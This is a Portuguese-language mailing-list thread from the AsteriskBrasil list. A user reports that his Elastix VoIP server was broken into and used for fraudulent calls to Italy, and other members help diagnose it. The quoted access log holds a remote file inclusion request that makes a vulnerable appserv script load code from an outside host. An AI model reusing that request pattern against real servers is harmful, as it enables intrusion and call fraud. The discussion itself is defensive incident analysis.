Para vc pesquisar isto que foi usado em vc, foi um SHELLCODE.<br><br><div class="gmail_quote">Em 22 de novembro de 2010 15:00, Alejandro Flores <span dir="ltr"><<a href="mailto:alejandrorflores@gmail.com">alejandrorflores@gmail.com</a>></span> escreveu:<br>
<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">Gleidison,<br>
<div class="im"><br>
> Sidinei,<br>
> Obrigado pela Resposta,<br>
> cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes<br>
> para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo.<br>
> alguem poderia me ajudar a bloquear isso.<br>
> /var/log/httpd/access_log<br>
> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs<br>
> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"<br>
> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET<br>
> /appserv/main.php?appserv_root=<a href="http://88.255.225.20/appserv/t.txt" target="_blank">http://88.255.225.20/appserv/t.txt</a>? HTTP/1.1"<br>
> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"<br>
<br>
</div>Você instalou algo mais no seu elastix? Ele faz referência a pastas<br>
que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo<br>
que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso,<br>
estava com falhas de segurança.<br>
Nessa segunda linha do log ele se certifica de que o servidor está<br>
'vulnerável' e depois disso você ta frito.<br>
<br>
<br>
--<br>
Abraço!<br>
Alejandro Flores<br>
<a href="http://www.triforsec.com.br/" target="_blank">http://www.triforsec.com.br/</a><br>
_______________________________________________<br>
<div class="im">KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk.<br>
- Hardware com alta disponibilidade de recursos e qualidade KHOMP<br>
</div><div class="im">- Suporte técnico local qualificado e gratuito<br>
</div>Conheça a linha completa de produtos KHOMP em <a href="http://www.khomp.com.br" target="_blank">www.khomp.com.br</a><br>
<div class="im">_______________________________________________<br>
Temos tudo para seu projeto VoIP com Asterisk!<br>
Descontos especiais para assinantes da AsteriskBrasil.org.<br>
Registre-se e receba um cupom exclusivo de desconto!<br>
Acesse agora <a href="http://www.voipmania.com.br" target="_blank">www.voipmania.com.br</a><br>
______________________________________________<br>
</div>Lista de discussões AsteriskBrasil.org<br>
<div><div></div><div class="h5"><a href="mailto:AsteriskBrasil@listas.asteriskbrasil.org">AsteriskBrasil@listas.asteriskbrasil.org</a><br>
<a href="http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil" target="_blank">http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil</a><br>
______________________________________________<br>
Para remover seu email desta lista, basta enviar um email em branco para <a href="mailto:asteriskbrasil-unsubscribe@listas.asteriskbrasil.org">asteriskbrasil-unsubscribe@listas.asteriskbrasil.org</a><br>
</div></div></blockquote></div><br><br clear="all"><br>-- <br>At.<br><br> <br> ____________________________<br> Nielsen Alves de Oliveira<br> Consultor em Sistemas Computacionais<br>
CIO<br> Free Solutions <br> Telefone: (65) 3025-7356<br> Celular: (65) 9287-5331 (Vivo)<br><br>